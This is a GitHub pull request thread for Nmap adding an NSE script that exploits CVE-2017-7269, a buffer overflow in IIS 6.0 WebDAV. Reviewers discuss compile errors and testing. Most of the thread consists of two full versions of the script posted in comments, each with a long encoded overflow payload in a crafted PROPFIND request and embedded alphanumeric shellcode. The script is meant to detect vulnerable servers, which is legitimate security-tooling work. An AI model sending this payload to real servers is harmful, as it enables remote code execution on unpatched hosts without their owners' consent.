Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

NSE script for exploiting BOF in IIS (CVE-2017-7269) #828

Open
wants to merge 6 commits into
base: master
Choose a base branch
from
Open

NSE script for exploiting BOF in IIS (CVE-2017-7269) #828

wants to merge 6 commits into from

Conversation

rewanthtammana
Copy link
Contributor

@rewanthtammana rewanthtammana commented Apr 5, 2017
edited
Loading

Developed NSE script for exploiting CVE-2017-7269, a Buffer Overflow vulnerability in Microsoft IIS 6.0 and Microsoft Windows Server 2003 R2.

@rewanthtammana rewanthtammana changed the title NSE script for BOF in IIS (CVE-2017-7269) NSE script for exploiting BOF in IIS (CVE-2017-7269) Apr 5, 2017
@fakenine
Copy link

Hello, your script does not compile in nmap 7.60

Starting Nmap 7.60 ( https://nmap.org ) at 2018-10-19 10:09 CEST
NSE: Updating rule database.
NSE: failed to initialize the script engine:
/usr/bin/../share/nmap/nse_main.lua:259: /usr/bin/../share/nmap/scripts//iis-buffer-overflow.nse:165: unexpected symbol near '='
stack traceback:
	[C]: in function 'assert'
	/usr/bin/../share/nmap/nse_main.lua:259: in upvalue 'loadscript'
	/usr/bin/../share/nmap/nse_main.lua:601: in field 'new'
	/usr/bin/../share/nmap/nse_main.lua:1296: in main chunk
	[C]: in ?

QUITTING!

fakenine
fakenine suggested changes Oct 19, 2018
View reviewed changes
Copy link

@fakenine fakenine left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I've added comments to fix the compile errors

scripts/iis-buffer-overflow.nse Outdated Show resolved Hide resolved
scripts/iis-buffer-overflow.nse Outdated Show resolved Hide resolved
scripts/iis-buffer-overflow.nse Outdated Show resolved Hide resolved
@fakenine
Copy link

Hello @rewanth1997, I've set up some Windows Server 2003 instances on AWS (dated from 2015) with IIS V6.0 installed to test your script, but I have not been able to have nmap successfully find the vulnerability.

Could you please provide more context on how you tested this ?

@rewanthtammana
Copy link
Contributor Author

rewanthtammana commented Oct 26, 2018
edited
Loading

Hi @fakenine ,
Thanks for working on this PR. Can you please share me more details on the architecture information of your AWS instance? It would be better if we can use twitter/telegram/other social networks to discuss more regarding your setup. It's better not to flood PR with discussion comments.

I pinged you on twitter & hangouts. If you aren't comfortable with either of them, please share me your preferred platform for more discussion.

@tarraschk
Copy link

Hello,

I work with @fakenine .

I noticed that you had made a custom shell payload focusing on the HTTP code sent by the targeted machine.

The payload from this repo is actually quite good as it echoes "CVE-2017-7269" on vulnerable machines https://github.com/lcatro/CVE-2017-7269-Echo-PoC.

I adapted this payload in the embedded script here:

local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"

-- NSE Buffer Overflow vulnerability in IIS

---
-- @usage
-- ./nmap iis-buffer-overflow <target>
--
-- @output
-- PORT   STATE  SERVICE
-- 80/tcp open   http
-- |  iis-buffer-overflow:
-- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- |       State: LIKELY_VULNERABLE
-- |       Risk factor: High CVSS: 10.0
-- |       Description:
-- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- |         service in Internet Information Services (IIS) 6.0
-- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- |         arbitrary code via a long header beginning with "If: <http://" in a
-- |         PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- |         Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- |    References:
-- |     https://github.com/edwardz246003/IIS_exploit,
-- |     https://github.com/lcatro/CVE-2017-7269-Echo-PoC,
-- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--

author = {
  "Zhiniang Peng",       -- Original author
  "Chen Wu",             -- Original author
  "LCatro",              -- Exploit author
  "Rewanth Cool",        -- NSE script author
  "Samy Kacimi",         -- NSE script contributor
  "Maxime Alay-Eddine"   -- NSE script contributor
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}

portrule = shortport.portnumber(80, "tcp")

action = function(host, port)
  local socket, response, try, catch, payload, shellcode, vulnerable_name

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.

Original exploit by Zhiniang Peng and Chen Wu.
    ]],
    IDS = {
      CVE = 'CVE-2017-7269'
    },
    scores = {
      CVSS = '10.0'
    },
    references = {
      'https://github.com/edwardz246003/IIS_exploit',
      'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
    },
    dates = {
      disclosure = {year = '2017', month = '03', day = '26'},
    }
  }

  -- If domain name doesn't exist this line of code takes ip into consideration
  vulnerable_name = host.targetname or host.ip

  socket = nmap.new_socket("tcp")
  socket:set_timeout(10000)
  catch = function()
    socket:close()
  end

  try = nmap.new_try(catch)
  try(socket:connect(host, port, "tcp"))

  -- Crafting the payload by parts

  -- Crafting the request with HTTP PROPFIND method
  payload = 'PROPFIND / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 0\r\n'
  payload = payload .. 'If: <http://localhost/aaaaaaa'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
  payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
  payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
  payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
  payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
  payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
  payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
  payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
  payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
  payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
  payload = payload .. '\xb3\xe3\x95\xb7'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
  payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
  payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
  payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
  payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
  payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
  payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'

  payload = payload .. '>'
  payload = payload .. ' (Not <locktoken:write1>) <http://localhost/bbbbbbb'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
  payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
  payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
  payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
  payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
  payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
  payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
  payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
  payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
  payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
  payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
  payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
  payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
  payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
  payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
  payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
  payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
  payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
  payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
  payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

  -- Shellcode
  shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
  shellcode = shellcode .. 'BAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTK'
  shellcode = shellcode .. 'OXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBN'
  shellcode = shellcode .. 'VO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0'
  shellcode = shellcode .. 'JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGN'
  shellcode = shellcode .. 'X9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPP'
  shellcode = shellcode .. 'SKOYEKPA'

  payload = payload .. shellcode
  payload = payload .. '>\r\n\r\n'

  -- Exploiting the vulnerability
  try(socket:send(payload))

  -- We receive a 200 response if the payload succeeds.
  response = try(socket:receive_bytes(80960))
  socket:close()
  
  -- Checking for flag in the response
  local flag = 'HHIT CVE%-2017%-7269 Success'
  
  if string.match(response, flag) then
    vuln.state = vulns.STATE.EXPLOIT
    vuln.exploit_results = response
  end

  return vuln_report:make_output(vuln)

end

Please do not hesitate if you want us to chat with Hangout or Telegram.

@rewanthtammana
Copy link
Contributor Author

Hi @fakenine @tarraschk ,

There is one more major issue in the above code. The PROPFIND request contains only http://localhost/ in the code. If the IIS server is running on ports other than 80 like 81,8080,8081, etc then the above script won't be able to yield positive results.

@rewanthtammana
Copy link
Contributor Author

For more insights on this fix check my PR on lcatro/CVE-2017-7269-Echo-PoC#4. Please fix this part and resend the code.

@tarraschk
Copy link

tarraschk commented Nov 2, 2018
edited
Loading

Done.

local nmap = require "nmap"
local string = require "string"
local shortport = require "shortport"
local vulns = require "vulns"

-- NSE Buffer Overflow vulnerability in IIS

---
-- @usage
-- ./nmap iis-buffer-overflow <target>
--
-- @output
-- PORT   STATE  SERVICE
-- 80/tcp open   http
-- |  iis-buffer-overflow:
-- |    VULNERABLE: Buffer Overflow in IIS 6 and Windows Server 2003 R2
-- |       State: LIKELY_VULNERABLE
-- |       Risk factor: High CVSS: 10.0
-- |       Description:
-- |         Buffer overflow in the ScStoragePathFromUrl function in the WebDAV
-- |         service in Internet Information Services (IIS) 6.0
-- |         in Microsoft Windows Server 2003 R2 allows remote attackers to execute
-- |         arbitrary code via a long header beginning with "If: <http://" in a
-- |         PROPFIND request, as exploited in the wild in July or August 2016.
-- |
-- |         Original exploit by Zhiniang Peng and Chen Wu.
-- |
-- |    References:
-- |     https://github.com/edwardz246003/IIS_exploit,
-- |     https://github.com/lcatro/CVE-2017-7269-Echo-PoC,
-- |_    https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html
--

author = {
  "Zhiniang Peng",       -- Original author
  "Chen Wu",             -- Original author
  "LCatro",              -- Exploit author
  "Rewanth Cool",        -- NSE script author
  "Samy Kacimi",         -- NSE script contributor
  "Maxime Alay-Eddine"   -- NSE script contributor
}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}

portrule = shortport.http

action = function(host, port)
  local socket, response, try, catch, payload, shellcode, vulnerable_name

  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
  local vuln = {
    title = 'Buffer Overflow in IIS 6 and Windows Server 2003 R2',
    state = vulns.STATE.NOT_VULN,
    risk_factor = "High",
    description = [[
Buffer overflow in the ScStoragePathFromUrl function in the WebDAV service in Internet Information Services (IIS) 6.0
in Microsoft Windows Server 2003 R2 allows remote attackers to execute arbitrary code via a long header beginning
with "If: <http://" in a PROPFIND request, as exploited in the wild in July or August 2016.

Original exploit by Zhiniang Peng and Chen Wu.
    ]],
    IDS = {
      CVE = 'CVE-2017-7269'
    },
    scores = {
      CVSS = '10.0'
    },
    references = {
      'https://github.com/edwardz246003/IIS_exploit',
      'https://0patch.blogspot.in/2017/03/0patching-immortal-cve-2017-7269.html'
    },
    dates = {
      disclosure = {year = '2017', month = '03', day = '26'},
    }
  }

  -- If domain name doesn't exist this line of code takes ip into consideration
  vulnerable_name = host.targetname or host.ip

  socket = nmap.new_socket("tcp")
  socket:set_timeout(10000)
  catch = function()
    socket:close()
  end

  try = nmap.new_try(catch)
  try(socket:connect(host, port, "tcp"))

  -- Crafting the payload by parts

  -- Crafting the request with HTTP PROPFIND method
  payload = 'PROPFIND / HTTP/1.1\r\nHost: localhost:' .. port.number .. '\r\nContent-Length: 0\r\n'
  payload = payload .. 'If: <http://localhost:' .. port.number .. '/aaaaaaa'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe6\xbd\xa8\xe7\xa1\xa3\xe7\x9d\xa1\xe7\x84\xb3\xe6\xa4\xb6\xe4\x9d\xb2\xe7\xa8\xb9\xe4\xad\xb7\xe4\xbd'
  payload = payload .. '\xb0\xe7\x95\x93\xe7\xa9\x8f\xe4\xa1\xa8\xe5\x99\xa3\xe6\xb5\x94\xe6\xa1\x85\xe3\xa5\x93\xe5\x81\xac\xe5'
  payload = payload .. '\x95\xa7\xe6\x9d\xa3\xe3\x8d\xa4\xe4\x98\xb0\xe7\xa1\x85\xe6\xa5\x92\xe5\x90\xb1\xe4\xb1\x98\xe6\xa9\x91'
  payload = payload .. '\xe7\x89\x81\xe4\x88\xb1\xe7\x80\xb5\xe5\xa1\x90\xe3\x99\xa4\xe6\xb1\x87\xe3\x94\xb9\xe5\x91\xaa\xe5\x80'
  payload = payload .. '\xb4\xe5\x91\x83\xe7\x9d\x92\xe5\x81\xa1\xe3\x88\xb2\xe6\xb5\x8b\xe6\xb0\xb4\xe3\x89\x87\xe6\x89\x81\xe3'
  payload = payload .. '\x9d\x8d\xe5\x85\xa1\xe5\xa1\xa2\xe4\x9d\xb3\xe5\x89\x90\xe3\x99\xb0\xe7\x95\x84\xe6\xa1\xaa\xe3\x8d\xb4'
  payload = payload .. '\xe4\xb9\x8a\xe7\xa1\xab\xe4\xa5\xb6\xe4\xb9\xb3\xe4\xb1\xaa\xe5\x9d\xba\xe6\xbd\xb1\xe5\xa1\x8a\xe3\x88'
  payload = payload .. '\xb0\xe3\x9d\xae\xe4\xad\x89\xe5\x89\x8d\xe4\xa1\xa3\xe6\xbd\x8c\xe7\x95\x96\xe7\x95\xb5\xe6\x99\xaf\xe7'
  payload = payload .. '\x99\xa8\xe4\x91\x8d\xe5\x81\xb0\xe7\xa8\xb6\xe6\x89\x8b\xe6\x95\x97\xe7\x95\x90\xe6\xa9\xb2\xe7\xa9\xab'
  payload = payload .. '\xe7\x9d\xa2\xe7\x99\x98\xe6\x89\x88\xe6\x94\xb1\xe3\x81\x94\xe6\xb1\xb9\xe5\x81\x8a\xe5\x91\xa2\xe5\x80'
  payload = payload .. '\xb3\xe3\x95\xb7'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe6\xa9\xb7\xe4\x85\x84\xe3\x8c\xb4\xe6\x91\xb6\xe4\xb5\x86\xe5\x99\x94\xe4\x9d\xac\xe6'
  payload = payload .. '\x95\x83\xe7\x98\xb2\xe7\x89\xb8\xe5\x9d\xa9\xe4\x8c\xb8\xe6\x89\xb2\xe5\xa8\xb0\xe5\xa4\xb8\xe5\x91\x88'
  payload = payload .. '\xc8\x82\xc8\x82\xe1\x8b\x80\xe6\xa0\x83\xe6\xb1\x84\xe5\x89\x96\xe4\xac\xb7\xe6\xb1\xad\xe4\xbd\x98\xe5'
  payload = payload .. '\xa1\x9a\xe7\xa5\x90\xe4\xa5\xaa\xe5\xa1\x8f\xe4\xa9\x92\xe4\x85\x90\xe6\x99\x8d\xe1\x8f\x80\xe6\xa0\x83'
  payload = payload .. '\xe4\xa0\xb4\xe6\x94\xb1\xe6\xbd\x83\xe6\xb9\xa6\xe7\x91\x81\xe4\x8d\xac\xe1\x8f\x80\xe6\xa0\x83\xe5\x8d'
  payload = payload .. '\x83\xe6\xa9\x81\xe7\x81\x92\xe3\x8c\xb0\xe5\xa1\xa6\xe4\x89\x8c\xe7\x81\x8b\xe6\x8d\x86\xe5\x85\xb3\xe7'
  payload = payload .. '\xa5\x81\xe7\xa9\x90\xe4\xa9\xac'

  payload = payload .. '>'
  payload = payload .. ' (Not <locktoken:write1>) <http://localhost:' .. port.number .. '/bbbbbbb'

  -- Random text added to payload (Can be modified only for experimental purposes)
  payload = payload .. '\xe7\xa5\x88\xe6\x85\xb5\xe4\xbd\x83\xe6\xbd\xa7\xe6\xad\xaf\xe4\xa1\x85\xe3\x99\x86\xe6'
  payload = payload .. '\x9d\xb5\xe4\x90\xb3\xe3\xa1\xb1\xe5\x9d\xa5\xe5\xa9\xa2\xe5\x90\xb5\xe5\x99\xa1\xe6\xa5\x92\xe6\xa9\x93\xe5'
  payload = payload .. '\x85\x97\xe3\xa1\x8e\xe5\xa5\x88\xe6\x8d\x95\xe4\xa5\xb1\xe4\x8d\xa4\xe6\x91\xb2\xe3\x91\xa8\xe4\x9d\x98\xe7'
  payload = payload .. '\x85\xb9\xe3\x8d\xab\xe6\xad\x95\xe6\xb5\x88\xe5\x81\x8f\xe7\xa9\x86\xe3\x91\xb1\xe6\xbd\x94\xe7\x91\x83\xe5'
  payload = payload .. '\xa5\x96\xe6\xbd\xaf\xe7\x8d\x81\xe3\x91\x97\xe6\x85\xa8\xe7\xa9\xb2\xe3\x9d\x85\xe4\xb5\x89\xe5\x9d\x8e\xe5'
  payload = payload .. '\x91\x88\xe4\xb0\xb8\xe3\x99\xba\xe3\x95\xb2\xe6\x89\xa6\xe6\xb9\x83\xe4\xa1\xad\xe3\x95\x88\xe6\x85\xb7\xe4'
  payload = payload .. '\xb5\x9a\xe6\x85\xb4\xe4\x84\xb3\xe4\x8d\xa5\xe5\x89\xb2\xe6\xb5\xa9\xe3\x99\xb1\xe4\xb9\xa4\xe6\xb8\xb9\xe6'
  payload = payload .. '\x8d\x93\xe6\xad\xa4\xe5\x85\x86\xe4\xbc\xb0\xe7\xa1\xaf\xe7\x89\x93\xe6\x9d\x90\xe4\x95\x93\xe7\xa9\xa3\xe7'
  payload = payload .. '\x84\xb9\xe4\xbd\x93\xe4\x91\x96\xe6\xbc\xb6\xe7\x8d\xb9\xe6\xa1\xb7\xe7\xa9\x96\xe6\x85\x8a\xe3\xa5\x85\xe3'
  payload = payload .. '\x98\xb9\xe6\xb0\xb9\xe4\x94\xb1\xe3\x91\xb2\xe5\x8d\xa5\xe5\xa1\x8a\xe4\x91\x8e\xe7\xa9\x84\xe6\xb0\xb5'

  -- Main payload (Do not edit this part)
  payload = payload .. '\xe5\xa9\x96\xe6\x89\x81\xe6\xb9\xb2\xe6\x98\xb1\xe5\xa5\x99\xe5\x90\xb3\xe3\x85\x82\xe5\xa1\xa5\xe5\xa5\x81\xe7'
  payload = payload .. '\x85\x90\xe3\x80\xb6\xe5\x9d\xb7\xe4\x91\x97\xe5\x8d\xa1\xe1\x8f\x80\xe6\xa0\x83\xe6\xb9\x8f\xe6\xa0\x80\xe6'
  payload = payload .. '\xb9\x8f\xe6\xa0\x80\xe4\x89\x87\xe7\x99\xaa\xe1\x8f\x80\xe6\xa0\x83\xe4\x89\x97\xe4\xbd\xb4\xe5\xa5\x87\xe5'
  payload = payload .. '\x88\xb4\xe4\xad\xa6\xe4\xad\x82\xe7\x91\xa4\xe7\xa1\xaf\xe6\x82\x82\xe6\xa0\x81\xe5\x84\xb5\xe7\x89\xba\xe7'
  payload = payload .. '\x91\xba\xe4\xb5\x87\xe4\x91\x99\xe5\x9d\x97\xeb\x84\x93\xe6\xa0\x80\xe3\x85\xb6\xe6\xb9\xaf\xe2\x93\xa3\xe6'
  payload = payload .. '\xa0\x81\xe1\x91\xa0\xe6\xa0\x83\xcc\x80\xe7\xbf\xbe\xef\xbf\xbf\xef\xbf\xbf\xe1\x8f\x80\xe6\xa0\x83\xd1\xae'
  payload = payload .. '\xe6\xa0\x83\xe7\x85\xae\xe7\x91\xb0\xe1\x90\xb4\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81\xe9\x8e\x91\xe6\xa0\x80'
  payload = payload .. '\xe3\xa4\xb1\xe6\x99\xae\xe4\xa5\x95\xe3\x81\x92\xe5\x91\xab\xe7\x99\xab\xe7\x89\x8a\xe7\xa5\xa1\xe1\x90\x9c'
  payload = payload .. '\xe6\xa0\x83\xe6\xb8\x85\xe6\xa0\x80\xe7\x9c\xb2\xe7\xa5\xa8\xe4\xb5\xa9\xe3\x99\xac\xe4\x91\xa8\xe4\xb5\xb0'
  payload = payload .. '\xe8\x89\x86\xe6\xa0\x80\xe4\xa1\xb7\xe3\x89\x93\xe1\xb6\xaa\xe6\xa0\x82\xe6\xbd\xaa\xe4\x8c\xb5\xe1\x8f\xb8'
  payload = payload .. '\xe6\xa0\x83\xe2\xa7\xa7\xe6\xa0\x81'

  -- Shellcode
  shellcode = 'VVYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA'
  shellcode = shellcode .. 'BAB30APB944JBRDDKLMN8KPM0KP4KOYM4CQJIOPKSKPKPTKLITKKQDKU0G0KPKPM00QQXI8KPM0M0K8KPKPKPM0QNTKKNU397N30WRJLMSSI7LNR72JPTK'
  shellcode = shellcode .. 'OXPZKQH0CR615NMNRP0NQNWNMOGP206NYKPOSRORN3D35RND4NMPTD9RP2ENZMPT4352XCDNOS8BTBMBLLMKZOSROBN441URNT4NMPL2ERNS7SDBHOJOBN'
  shellcode = shellcode .. 'VO0LMLJLMKZ0HOXOY0TO0OS260ENMNRP0NQOGNMOGOB06OIMP2345RCS3RET3D3M0KLK8SRM0KPM0C0SYK5NQWP2DDK0PNP4KQBLLTKQBMDDKD2MXLOGG0'
  shellcode = shellcode .. 'JO6NQKO6LOLQQSLKRNLMP7QXOLMM18G9RJRR2R74KQBLP4K0JOL4K0LN1RXK3PHKQHQ0Q4K29MPM19CTKQ9MH9SOJQ94KNTTKKQJ6P1KOFLY1XOLMKQXGN'
  shellcode = shellcode .. 'X9PD5KFM33MKHOKSMO42UJDPXTKB8O4KQIC1V4KLL0K4K0XMLKQXSTKKTTKKQJ0CYQ4O4MTQKQK1QR90Z0QKOYPQOQOQJ4KLRJKTM1MWKOWMCBR2OQZKPP'
  shellcode = shellcode .. 'SKOYEKPA'

  payload = payload .. shellcode
  payload = payload .. '>\r\n\r\n'

  -- Exploiting the vulnerability
  try(socket:send(payload))

  -- We receive a 200 response if the payload succeeds.
  response = try(socket:receive_bytes(80960))
  socket:close()
  
  -- Checking for flag in the response
  local flag = 'HHIT CVE%-2017%-7269 Success'
  
  if string.match(response, flag) then
    vuln.state = vulns.STATE.EXPLOIT
    vuln.exploit_results = response
  end

  return vuln_report:make_output(vuln)

end

Could you please double check it on your side? I'd like to be sure that it works also on your side with your own vulnerable targeted machine.

Please also note that I changed the portrule to match any http-likely port.

@tarraschk
Copy link

Just to prove that I tested the script, here are the results on a vulnerable machine:

Vulnerable machine with the port 80 exposed:

PORT     STATE SERVICE
80/tcp   open  http
| iis-buffer-overflow:
